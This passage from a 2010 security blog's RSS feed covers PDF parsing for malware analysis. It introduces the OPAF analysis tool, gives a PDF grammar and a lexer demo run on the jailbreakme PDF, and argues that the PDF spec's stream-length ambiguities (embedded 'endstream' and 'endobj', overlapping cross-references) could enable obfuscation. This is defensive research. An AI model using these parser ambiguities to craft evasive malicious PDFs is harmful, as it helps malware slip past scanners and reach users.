  'ASCII85Decode': 163,
  'CCITTFaxDecode': 128,
  'JBIG2Decode': 2,
  'LZWDecode': 559,
  'FlateDecode': 9075,
  'DCTDecode': 608,
  'JPXDecode': 3}

Object Type frequencies:
{'XObject': 2699,
  'Group': 45,
  'Pattern': 3,
  'PropertyList': 1,
  'OCG': 12,
  'OBJR': 3,
  'OCMD': 7,
  'ObjStm': 204,
  'Metadata': 161,
  'FileSpec': 159,
  'ExtGState': 598,
  'Halftone': 12,
  'Catalog': 95,
  'ViewerPreferences': 1,
  'Outlines': 18,
  'Filespec': 10,
  'Mask': 8,
  'Annot': 5300,
  'StructTreeRoot': 13,
  'FontDescriptor': 955,
  'Action': 32,
  'Page': 2962,
  'XRef': 24,
  'Encoding': 219,
  'EmbeddedFile': 4,
  'Pages': 427,
  'Font': 1473,
  'JobTicketContents': 1}</pre>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/feliam.wordpress.com/486/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/feliam.wordpress.com/486/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=feliam.wordpress.com&#038;blog=11378149&#038;post=486&#038;subd=feliam&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://feliam.wordpress.com/2010/08/26/pdf-stats/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/194a46a39d3b23da4a451128da9051ed?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">feliam</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/09/t_small-b.png" medium="image">
			<media:title type="html">Follow feliam on Twitter</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/08/filtersfrq.png?w=300" medium="image">
			<media:title type="html">filtersfrq</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/08/frequencies.png?w=300" medium="image">
			<media:title type="html">frequencies</media:title>
		</media:content>
	</item>
		<item>
		<title>Opaf!</title>
		<link>http://feliam.wordpress.com/2010/08/23/opaf/</link>
		<comments>http://feliam.wordpress.com/2010/08/23/opaf/#comments</comments>
		<pubDate>Mon, 23 Aug 2010 05:11:16 +0000</pubDate>
		<dc:creator>feliam</dc:creator>
				<category><![CDATA[pdf]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[malware analisys]]></category>
		<category><![CDATA[parser]]></category>

		<guid isPermaLink="false">http://feliam.wordpress.com/?p=451</guid>
		<description><![CDATA[It&#8217;s an Open PDF Analysis Framework! A pdf file rely on a complex file structure constructed from a set tokens, and grammar rules. Also each token being potentially compressed, encrypted or even obfuscated. Open PDF Analysis Framework will understand, decompress, de-obfuscate this basic pdf elements and present the resulting soup as a clean XML tree(done!). [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=feliam.wordpress.com&#038;blog=11378149&#038;post=451&#038;subd=feliam&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<h1>It&#8217;s an Open PDF Analysis Framework!</h1>
<table>
<tbody>
<tr>
<td>A pdf file rely on a complex file structure constructed from a set tokens, and grammar rules. Also each token being potentially compressed, encrypted or even obfuscated. <strong>Open PDF Analysis Framework</strong> will understand, decompress, de-obfuscate this basic pdf elements and present the resulting soup as a clean XML tree(done!). From there the idea is to compile a set of rules that can can be used to decide what to keep, what to cut out and ultimately if it is safe to open the resulting pdf projection(todo!).</td>
<td><a href="http://feliam.files.wordpress.com/2010/08/expansion-2.png"><img class="alignright size-medium wp-image-459" title="expansion-2" src="http://feliam.files.wordpress.com/2010/08/expansion-2.png?w=240&#038;h=240" alt="" width="240" height="240" /></a></td>
</tr>
</tbody>
</table>
<p>Its written in python using <a href="http://www.dabeaz.com/ply/">PLY</a> parser generator. The project page is <a href="http://code.google.com/p/opaf/source/checkout">here</a> and you can get the code from here:</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">svn checkout <a href="http://opaf.googlecode.com/svn/trunk/" rel="nofollow">http://opaf.googlecode.com/svn/trunk/</a> opaf-read-only</div>
<p style="text-align:left;">Keep reading for a test run&#8230;<br />
<span id="more-451"></span><br />
Most of the work OPAF! will hide from you is outlined in our earlier posts about <a href="http://feliam.wordpress.com/2010/08/06/lexing-pdf-just-for-the-un-fun-of-it/">scanning a pdf</a>, <a href="http://feliam.wordpress.com/2010/08/22/pdf-sequential-parsing/">parsing a pdf</a> and also the one discussing the caveats in the actual PDF ISO standard <a href="http://feliam.wordpress.com/2010/08/14/pdf-a-broken-spec/">here.</a>. Besides the straight forward natural parsing algorithm the lib also tries a brute force algorithm based on just few tokens. Let&#8217;s take a look of what it can already do&#8230;</p>
<p>Well, you first need a shady pdf like this <a href="http://feliam.files.wordpress.com/2010/08/textg.pdf">one</a>. This is not any alien PDF and that&#8217;s nothing really malicious about it. It even look plain&#8230;<br />
<a href="http://feliam.files.wordpress.com/2010/08/pdf.png"><img class="size-medium wp-image-452 aligncenter" title="pdf" src="http://feliam.files.wordpress.com/2010/08/pdf.png?w=222&#038;h=300" alt="" width="222" height="300" /></a></p>
<p>&#8230; but if you try to open it with a tex/hex editor it stop being so friendly&#8230;</p>
<p style="text-align:center;"><a href="http://feliam.files.wordpress.com/2010/08/pdfhex.png"><img class="size-medium wp-image-453 aligncenter" title="pdfhex" src="http://feliam.files.wordpress.com/2010/08/pdfhex.png?w=300&#038;h=215" alt="" width="300" height="215" /></a></p>
<p>Here is where you get to try the OPAF! thing. Get the code and the pdf, solve the dependencies an run it like this..</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">python opaf.py textg.pdf</div>
<p style="text-align:center;">it will generate a graph like the following for your ammusment..<br />
<a href="http://feliam.files.wordpress.com/2010/08/graphpdf.png"><img class="size-medium wp-image-454 aligncenter" title="graphpdf" src="http://feliam.files.wordpress.com/2010/08/graphpdf.png?w=300&#038;h=300" alt="" width="300" height="300" /></a></p>
<p style="text-align:left;">That shows the minimalistic logical structure of this PDF. Note that you may get really big graphs here with other pdf samples.I have tried up to 3k nodes. Thats fun! But sadly not very useful. But that&#8217;s not all! It also gets you an XML representation of the pdf. This XML will look like this&#8230;<br />
<a href="http://feliam.files.wordpress.com/2010/08/pdfxml.png"><img class="size-medium wp-image-455 aligncenter" title="pdfxml" src="http://feliam.files.wordpress.com/2010/08/pdfxml.png?w=300&#038;h=205" alt="" width="300" height="205" /></a></p>
<p style="text-align:left;">After this step, well you pretty much put in the game every known xml technology. XPATH being the most notable one when searching for specific things. In the project, the small, young, not finished, work in progress flagged, not really well coded project there are some examples of what you can do when got the pdf in its xml form. Use it, ignore it, patch it(lots of basic things to be done yet). Its open source!!! f/</p>
<p><span style="color:#ff0000;">&#8211;update&#8211;</span><br />
Made a snapshot for you, download it <a href="http://sites.google.com/site/felipeandresmanzano/opaf-read-only.tar.bz2">here</a>. Also in the news, the main tool now accepts some basic arguments&#8230;</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>/opaf $ python opaf.py  --help
Usage: opaf.py [options]

Options:
  -h, --help            show this help message and exit
  -x XML, --xmlfile=XML
                        Generate an xml file.
  -l LOG, --logfile=LOG
                        Dump log messages to LOG file.
  -i, --interactive     Throw interactive python shell
  -g GRAPH, --graph=GRAPH
                        Generate and dump graph to GRAPH.
  -d, --decompress      Apply a filter pack to decompress and parse objec
                        streams.</pre>
</div>
<p>Also check out the next post for an example use; Taking statistics on pdf fuzzing databases with OPAF!. <a href="http://wp.me/pLJYx-7Q">http://wp.me/pLJYx-7Q</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/feliam.wordpress.com/451/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/feliam.wordpress.com/451/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=feliam.wordpress.com&#038;blog=11378149&#038;post=451&#038;subd=feliam&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://feliam.wordpress.com/2010/08/23/opaf/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/194a46a39d3b23da4a451128da9051ed?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">feliam</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/08/expansion-2.png?w=300" medium="image">
			<media:title type="html">expansion-2</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/08/pdf.png?w=222" medium="image">
			<media:title type="html">pdf</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/08/pdfhex.png?w=300" medium="image">
			<media:title type="html">pdfhex</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/08/graphpdf.png?w=300" medium="image">
			<media:title type="html">graphpdf</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/08/pdfxml.png?w=300" medium="image">
			<media:title type="html">pdfxml</media:title>
		</media:content>
	</item>
		<item>
		<title>PDF sequential parsing</title>
		<link>http://feliam.wordpress.com/2010/08/22/pdf-sequential-parsing/</link>
		<comments>http://feliam.wordpress.com/2010/08/22/pdf-sequential-parsing/#comments</comments>
		<pubDate>Sun, 22 Aug 2010 01:52:32 +0000</pubDate>
		<dc:creator>feliam</dc:creator>
				<category><![CDATA[pdf]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[parser]]></category>

		<guid isPermaLink="false">http://feliam.wordpress.com/?p=441</guid>
		<description><![CDATA[As discussed in earlier posts the problem with PDF is that we can not apply an out-of-the-box scanner/parser design pattern. It won&#8217;t let you scan it properly. The size of a PDF stream is hard to be decided at scanner/lexer time. I&#8217;ve suggested the solution of escaping the &#8220;endstream&#8221; keyword. Also other patches emerged like, [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=feliam.wordpress.com&#038;blog=11378149&#038;post=441&#038;subd=feliam&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<p><a href="http://feliam.files.wordpress.com/2010/08/opaf-e1282442420334.png"><img src="http://feliam.files.wordpress.com/2010/08/opaf-e1282442420334.png?w=300&#038;h=187" alt="" title="opaf" width="300" height="187" class="alignright size-medium wp-image-440" /></a>As discussed in earlier posts the problem with PDF is that we can not apply an out-of-the-box scanner/parser design pattern. It won&#8217;t let you scan it properly. The size of a PDF stream is hard to be decided at scanner/lexer time. I&#8217;ve suggested the solution of escaping the &#8220;endstream&#8221; keyword. Also other patches emerged like, forcing the /Length keyword to be direct. Or calculate every object size using XREFs pointers (assuming not garbage between the objs (which in fact is what the spec says)).</p>
<p>Well in any case if you manage to run a lexer and tokenize it here you have the parsing grammar &#8230; weeee!!</p>
<pre>
object : NAME | STRING | HEXSTRING | NUMBER | TRUE | FALSE | NULL | R | dictionary | array 

dictionary : DOUBLE_LESS_THAN_SIGN dictionary_entry_list DOUBLE_GREATER_THAN_SIGN 

dictionary_entry_list : NAME object dictionary_entry_list
                      | empty  

array : LEFT_SQUARE_BRACKET object_list RIGHT_SQUARE_BRACKET 

object_list : object object_list 
            | empty

indirect : indirect_object_stream
         | indirect_object 

indirect_object : OBJ object ENDOBJ 
indirect_object_stream : OBJ dictionary STREAM_DATA ENDOBJ 

xref : indirect_object_stream 
     | XREF TRAILER dictionary 

pdf : HEADER pdf_update_list
pdf_update_list : pdf_update_list body xref pdf_end
                | body xref pdf_end

body : body indirect_object 
     | body indirect_object_stream 
     | empty

pdf_end : STARTXREF EOF
</pre>
<p>f/</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/feliam.wordpress.com/441/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/feliam.wordpress.com/441/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=feliam.wordpress.com&#038;blog=11378149&#038;post=441&#038;subd=feliam&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://feliam.wordpress.com/2010/08/22/pdf-sequential-parsing/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/194a46a39d3b23da4a451128da9051ed?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">feliam</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/08/opaf-e1282442420334.png?w=300" medium="image">
			<media:title type="html">opaf</media:title>
		</media:content>
	</item>
		<item>
		<title>PDF, A broken Spec!</title>
		<link>http://feliam.wordpress.com/2010/08/14/pdf-a-broken-spec/</link>
		<comments>http://feliam.wordpress.com/2010/08/14/pdf-a-broken-spec/#comments</comments>
		<pubDate>Sat, 14 Aug 2010 22:26:30 +0000</pubDate>
		<dc:creator>feliam</dc:creator>
				<category><![CDATA[pdf]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[ISO32000]]></category>
		<category><![CDATA[specificaion]]></category>

		<guid isPermaLink="false">http://feliam.wordpress.com/?p=395</guid>
		<description><![CDATA[(Or why I can&#8217;t parse a PDF) This post is about the difficulties I ran into when trying to write a PDF parser. It&#8217;s my opinion that PDF specification is broken because it permits the token &#8220;endstream&#8221; inside a stream! Summary: There are  4 ways of deciding the size of a PDF stream: [+] Scanning for [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=feliam.wordpress.com&#038;blog=11378149&#038;post=395&#038;subd=feliam&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<h1>(Or why I can&#8217;t parse a PDF)</h1>
<table>
<tbody>
<tr>
<td>This post is about the difficulties I ran into when trying to write a PDF parser. It&#8217;s my opinion that</p>
<div style="margin:15px;padding:15px;">
<h3>PDF specification is broken because it permits the token &#8220;endstream&#8221; inside a stream!</h3>
</div>
</td>
<td><a href="http://feliam.files.wordpress.com/2010/08/adobe_pdf_broken.jpg"><img class="alignleft size-medium wp-image-422" title="adobe_pdf_broken" src="http://feliam.files.wordpress.com/2010/08/adobe_pdf_broken.jpg?w=126&#038;h=126" alt="" width="126" height="126" /></a></td>
</tr>
</tbody>
</table>
<h2>Summary:</h2>
<p>There are  4 ways of deciding the size of a PDF stream:</p>
<p style="padding-left:30px;">[+] Scanning for the &#8220;endstream&#8221; token<br />
[1] Scanning for the <strong>endstream</strong> token<br />
[2] Get the size from the direct <strong>\Length</strong> entry<br />
[3] Get the indirect <strong>\Length</strong> using the normal xref<br />
[4] Calculate the size from the starting marks pointed from the Normal cross-reference </p>
<p>What happens in actual PDF implementations if:</p>
<p style="padding-left:30px;">[+] Cross-reference is broken?<br />
[+] Cross-reference point to overlapped objects<br />
[+] Streams contains the <strong>endstream </strong>token<br />
[+] Streams contains some evil <strong>endstream/</strong><strong>endobj </strong>token combination<strong> </strong><br />
[+] If all the 4(or more) ways of parsing a PDF stream are present, should they be all consistent?</p>
<p>And finally, is this <a href="http://feliam.files.wordpress.com/2010/08/overlap.pdf">file</a> PDF compliant? I bet someone may construct an obfuscation method based in this &#8220;issues&#8221;.</p>
<p>If you still think this is worth reading check out the following details and please comment if you find bug if you have a solution for the problems I stated here.</p>
<p><span id="more-395"></span></p>
<h1>The problem&#8230;</h1>
<p>A PDF stream Must be an indirect object. An indirect object is a PDF object enclosed between the keywords <strong>obj</strong> and <strong>endobj</strong>. If the following indirect object happens to be in your pdf:</p>
<pre>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #fcffb3;color:#008079;margin:10px;padding:10px;">obj 100 0
123456789
endobj</div>
</pre>
<p>then any reference of the form &#8220;<strong>R 100 0</strong>&#8221; appearing in the PDF will reference the number <strong>1234567789</strong>. Everything seams clean for indirect numbers and the other basic types like strings, arrays and even dictionaries. The problem arises with the PDF streams</p>
<blockquote><p>A stream object, like a string object, is a sequence of bytes. A stream shall consist of a dictionary followed by zero or more bytes bracketed between the keywords <strong>stream</strong>(followed by newline) and <strong>endstream</strong>.</p></blockquote>
<p>A stream will look like this&#8230;</p>
<pre>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #fcffb3;color:#008079;margin:10px;padding:10px;">&lt;&lt; \Length 100 &gt;&gt;
stream
AAAAAA ... AAAAAA
endstream</div>
</pre>
<h1>[1] Scan for the next <strong>endstream</strong></h1>
<pre>
<div style="border:2px solid gray;background:none repeat scroll 0 0 #989bb3;color:#0a8079;margin:20px;padding:20px;">First approach: GO UNTIL "endstream" KEYWORD
    pros: clean scan all the file then parse order.
    cons: slow and broken if endstream inside stream</div>
</pre>
<p>The first naive approach when parsing PDF stream is to consume the dictionary &#8230;</p>
<pre>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #fcffb3;color:#008079;margin:10px;padding:10px;">&lt;&lt; \Length 100              &gt;&gt;  ----&gt;         { "Length": 100 }</div></pre>
<p>&#8230; then check if you have a <strong>stream</strong> keyword and scan until you get an <strong>endstream</strong></p>
<pre>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #fcffb3;color:#008079;margin:10px;padding:10px;">stream
AAAAAA ... AAAAAA
endstream           ----&gt;         '''AAAAA ... AAAAA'''</div></pre>
<p>But, what if you for some reason you want to have the string &#8220;endstream&#8221; inside the PDF stream. Well something will obviously go wrong. Just try to naive-parse the following stream (wich contains the endstream string inside its payload):</p>
<pre>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #fcffb3;color:#008079;margin:10px;padding:10px;">&lt;&lt; \Length 100 &gt;&gt;
stream
AAAAAA ... AAAAendstream\nAAA ... AAAAAA
endstream</div></pre>
<p>You&#8217;ll get a stream shorter than it should be followed by some binary garbage left out the stream lmits.</p>
<p>That&#8217;s <strong>wrong</strong> by specification. A PDF stream MUST be an indirect object. So it MUST be also enclosed inside the <strong>obj N M</strong>, <strong>endobj</strong> tokens, like this:</p>
<pre><div style="border:1px solid gray;background:none repeat scroll 0 0 #fcffb3;color:#008079;margin:10px;padding:10px;">100 0 obj
&lt;&lt; \Length 100 &gt;&gt;
stream
AAAAAA ... AAAAendstream\nAAA ... AAAAAA
endstream
endobj</div></pre>
<p>Interesting but, that&#8217;s not going to fix the problem because we can also put the <strong>endobj</strong> keyword inside the binary stream. In fact we can simulate a complete trailing PDF structure inside the stream. Try to parse this by hand (ignore the <strong>\Length</strong> for now)&#8230;</p>
<pre> <div style="border:1px solid gray;background:none repeat scroll 0 0 #fcffb3;color:#008079;margin:10px;padding:10px;">100 0 obj
&lt;&lt; \Length 100 &gt;&gt;
stream
AAAAAA ... AAAA
endstream
endobj
101 0 obj
(string)
endobj
AAA ... AAAAAA
endstream
endobj</div>

</pre>
<p>It should be interpreted as a stream containing this binary payload&#8230;</p>
<pre>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #fcffb3;color:#008079;margin:10px;padding:10px;">AAAAAA ... AAAA
endstream
endobj
101 0 obj
(string)
endobj
AAA ... AAAAAA
endstream</div>

</pre>
<p>NOTE: poppler,xpdf, and adobe parse it correctly no matter the bugging &#8220;endstream&#8221;.</p>
<p>Yeah right. The only thing that gets clear here is the fact that we can not rely &#8220;only&#8221; in the appearing of the <strong>stream</strong>,<strong>endstream</strong>,<strong>obj</strong>,<strong>endobj</strong> keywords. We need something else.</p>
<h1>[2] The mandatory /Length keyword.</h1>
<pre><div style="border:2px solid gray;background:none repeat scroll 0 0 #989bb3;color:#0a8079;margin:20px;padding:20px;">Second approach: GET THE \Length ENTRY
pros: fast and deterministic.
cons: Length could be an indirect object and depend on xref</div></pre>
<p>Each stream object MUST have a <strong>/Length</strong> keyword in its dictionary for solving the ambiguities and speeding the scanning process. The <strong>/Length</strong> keyword must be a number indicating the amount of bytes in the stream. If we know the length we can &#8220;seek&#8221; until near the end of the stream payload and just check for the existence of <strong>endstream</strong> keyword.</p>
<p><strong>Caveat 1</strong>: What happens when there is not an endstream</strong> keyword where it&#8217;s suppose to be one.</p>
<p><strong>Caveat 2:</strong> As a way to facilitate the production of PDF files they let the Length value to be potentially an indirect reference to a number. That&#8217;s very useful when producing a PDF stream. This way you can procrastinate the setting of the length until you have already put the (potentially compressed) stream of bytes in place and then produce the size.</p>
<p style="padding-left:30px;">[+] Put a reference to a not yet defined length in the dictionary<br />
[+] Put the dictionary<br />
[+] Produce the stream<br />
[+] Set the length in the referenced indirect object</p>
<p>So, for parsing a stream object we need to get another indirect object. Indirect objects are defined with <strong>obj</strong> and <strong>endobj</strong> keywords. But <strong>obj</strong> and <strong>endobj</strong> could appear inside a stream too. Deadlock? Or there is another hidden card in the spec?..</p>
<h1>[3] The Normal Cross reference.</h1>
<div style="border:2px solid gray;background:none repeat scroll 0 0 #989bb3;color:#0a8079;margin:20px;padding:20px;">Third approach: CALCULATE THE SIZES OF THE OBJECTS USING THE XREF<br />
pros: super fast.<br />
cons: overlapping objects</div>
<p>The PDF cross reference is the fastest way to know where certain indirect pdf object starts! It comes in too flavours, normal XREF and a stream XREF.</p>
<p>But first we need to find where the XREF is placed. That is done with the help of the <strong>startxref</strong> keyword. This keyword must appear almost at the end of the file and point to the byte position of the trailer an cross reference. Check out the section 7.5.5 of the spec (PDF3200::7.5.5) for more detail. A pdf should end like this.</p>
<pre>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #fcffb3;color:#008079;margin:10px;padding:10px;">
trailer
    &lt;&lt; key1 value1         key2 value2         ...         keyn valuen     &gt;&gt;
startxref
Byte_offset_of_last_cross-reference_section
%%EOF</div></pre>
<p>The spec suggests that conforming readers should read a PDF file from its end. Once you have the cross reference you know where the different indirect objects start. Also if you assume every cross-referenced position points only to one well defined object, you may after some calculation determine the size of every object. This will be the third way of determining a pdf stream length. What happens if this way doesn&#8217;t match the others?</p>
<h1>[4] The Cross Reference Stream.</h1>
<p>There are also cross-references streams. Cross-reference streams are stream objects, and contain a dictionary and a data stream. Each cross-reference stream contains the information equivalent to the cross-reference table and trailer for one cross-reference section.</p>
<p>The value following the <strong>startxref</strong> keyword shall be the offset of the cross-reference stream rather than the <strong>xref</strong> keyword. For files that use cross-reference streams entirely, the keywords <strong>xref</strong> and <strong>trailer</strong> shall no longer be used. Therefore, with the exception of the <strong>startxref address %%EOF</strong> segment and comments, a file may be entirely a sequence of objects.</p>
<p>So there is a way, the modern way, to hold cross references in potentially compressed pdf streams in the middle of the file. How do we parse this pdf stream? We don&#8217;t have the cross reference trick for getting the length of this stream. So we could do the buggy scan-to-the-next-endstream way or the <strong>\Length</strong> way. But is the <strong>\Length</strong> entry in the cross reference stream indirect? The spec enforces that some of the entries in the XStream dictionary not to be indirect, but not the /Length. ok, timeout. Head about to explode alert, hurn hurn!!</p>
<h1>The Linearyzed hell.</h1>
<p>More research need to be done on this one. We&#8217;ll just quote a bit of the spec on this matter&#8230;</p>
<blockquote><p>&#8221;&#8217;For pedagogical reasons the linearized PDF is considered to be composed from 11 parts&#8230;&#8221;&#8217;</p></blockquote>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/feliam.wordpress.com/395/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/feliam.wordpress.com/395/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=feliam.wordpress.com&#038;blog=11378149&#038;post=395&#038;subd=feliam&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://feliam.wordpress.com/2010/08/14/pdf-a-broken-spec/feed/</wfw:commentRss>
		<slash:comments>23</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/194a46a39d3b23da4a451128da9051ed?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">feliam</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/08/adobe_pdf_broken.jpg?w=300" medium="image">
			<media:title type="html">adobe_pdf_broken</media:title>
		</media:content>
	</item>
		<item>
		<title>Lexing PDF, just for the not-fun of it.</title>
		<link>http://feliam.wordpress.com/2010/08/06/lexing-pdf-just-for-the-un-fun-of-it/</link>
		<comments>http://feliam.wordpress.com/2010/08/06/lexing-pdf-just-for-the-un-fun-of-it/#comments</comments>
		<pubDate>Fri, 06 Aug 2010 20:31:27 +0000</pubDate>
		<dc:creator>feliam</dc:creator>
				<category><![CDATA[pdf]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[lexer]]></category>
		<category><![CDATA[malware analisys]]></category>
		<category><![CDATA[parser]]></category>

		<guid isPermaLink="false">http://feliam.wordpress.com/?p=367</guid>
		<description><![CDATA[In an attempt to irrevocably declare my insanity I went into the details of making a PDF lexer the most strict to the specification I can. This post is about making a Portable File Format lexer in python using the PLY parser generator. This lexer is based on the ISO 32000-1 standard. Yes! PDF is [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=feliam.wordpress.com&#038;blog=11378149&#038;post=367&#038;subd=feliam&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<div style="position:fixed;">
<div style="position:relative;left:-3em;">
<a href="http://www.twitter.com/feliam"><img src="http://feliam.files.wordpress.com/2010/09/t_small-b.png?w=460" alt="Follow feliam on Twitter" /></a>
</div>
</div>
<p>In an attempt to irrevocably declare my insanity I went into the details of making a PDF lexer the most strict to the specification I can. This post is about making a Portable File Format lexer in python using the <a href="http://www.dabeaz.com/ply/">PLY parser generator</a>. This lexer is based on the ISO 32000-1 standard. Yes! PDF is an ISO standard, <a href="http://blogs.adobe.com/asset/2010/08/pssst-pdf-is-an-iso-standard.html">see</a>. </p>
<p>In a PDF we have hexstrings and strings, numbers, names, arrays, references and null, booleans, dictionaries, streams and the file structure entities (the header, the trailer dictionary, the eof mark, the startxref mark and the crossreference). We are going to describe in detail all the tokens needed to define the named entities. You&#8217;ll probably want to take a look on how a parser is written in PLY at this simple <a href="http://www.dabeaz.com/ply/example.html">example</a>.</p>
<h1>QUICK DEMO</h1>
<p>Before we go into the really really really boring stuff, let&#8217;s do a quick demonstration of it&#8217;s value&#8230;<br />
Let&#8217;s pick a random PDF out there&#8230; hmm..  for example <a href="http://www.jailbreakme.com/_/iPhone3%2c1_4.0.pdf">jailbrakeme.pdf</a>. Then grab the already done lexer <a href="http://pastebin.com/r0SbpsJB">here</a> and run it like this&#8230;</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
python lexer.py &#8220;iPhone3,1_4.0.pdf&#8221;
</div>
<p>it should output something like this&#8230;</p>
<pre>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
iPhone3,1_4.0.pdf
LexToken(HEADER,'1.3',1,0)
LexToken(OBJ,('4', '0'),1,22)
LexToken(DOUBLE_LESS_THAN_SIGN,'&lt;&gt;',1,45)
LexToken(STREAM_DATA,'q Q q 18 750 576 24 re W n /C ... ( ) Tj ET Q Q',1,48)
LexToken(ENDOBJ,'endobj',1,696)
LexToken(OBJ,('2', '0'),1,703)
LexToken(DOUBLE_LESS_THAN_SIGN,'&lt;&gt;',1,797)
LexToken(ENDOBJ,'endobj',1,800)
LexToken(OBJ,('6', '0'),1,807)
LexToken(DOUBLE_LESS_THAN_SIGN,'&lt;&lt;&#039;,1,815)
LexToken(NAME,&#039;ProcSet&#039;,1,818)
LexToken(LEFT_SQUARE_BRACKET,&#039;[&#039;,1,827)
LexToken(NAME,&#039;PDF&#039;,1,829)
LexToken(NAME,&#039;Text&#039;,1,834)
LexToken(RIGHT_SQUARE_BRACKET,&#039;]&#039;,1,840)
LexToken(NAME,&#039;ColorSpace&#039;,1,842)
LexToken(DOUBLE_LESS_THAN_SIGN,&#039;&lt;&gt;',1,868)
LexToken(NAME,'Font',1,871)
LexToken(DOUBLE_LESS_THAN_SIGN,'&lt;&gt;',1,892)
LexToken(DOUBLE_GREATER_THAN_SIGN,'&gt;&gt;',1,895)
LexToken(ENDOBJ,'endobj',1,898)
LexToken(OBJ,('3', '0'),1,905)
LexToken(DOUBLE_LESS_THAN_SIGN,'&lt;&gt;',1,978)
LexToken(ENDOBJ,'endobj',1,981)
LexToken(OBJ,('12', '0'),1,988)
LexToken(DOUBLE_LESS_THAN_SIGN,'&lt;&gt;',1,1028)
LexToken(ENDOBJ,'endobj',1,1031)
LexToken(OBJ,('13', '0'),1,1038)
LexToken(DOUBLE_LESS_THAN_SIGN,'&lt;&gt;',1,1102)
LexToken(STREAM_DATA,'x\x9c\xed}\rXT\xd7\xd5\xee\x1e...",1,1105)
LexToken(ENDOBJ,'endobj',1,11834)
LexToken(OBJ,('15', '0'),1,11841)
LexToken(DOUBLE_LESS_THAN_SIGN,'&lt;&gt;',1,12058)
LexToken(ENDOBJ,'endobj',1,12061)
LexToken(OBJ,('16', '0'),1,12068)
LexToken(LEFT_SQUARE_BRACKET,'[',1,12077)
LexToken(NUMBER,'556',1,12079)
LexToken(RIGHT_SQUARE_BRACKET,']',1,12083)
LexToken(ENDOBJ,'endobj',1,12085)
LexToken(OBJ,('9', '0'),1,12092)
LexToken(DOUBLE_LESS_THAN_SIGN,'&lt;&gt;',1,12254)
LexToken(ENDOBJ,'endobj',1,12257)
LexToken(OBJ,('18', '0'),1,12264)
LexToken(NUMBER,'9332',1,12273)
LexToken(ENDOBJ,'endobj',1,12278)
LexToken(OBJ,('20', '0'),1,12285)
LexToken(LEFT_SQUARE_BRACKET,'[',1,12294)
LexToken(NUMBER,'316',1,12296)
LexToken(NUMBER,'0',1,12300)
.
LexToken(NUMBER,'613',1,12516)
LexToken(RIGHT_SQUARE_BRACKET,']',1,12520)
LexToken(ENDOBJ,'endobj',1,12522)
LexToken(OBJ,('1', '0'),1,12529)
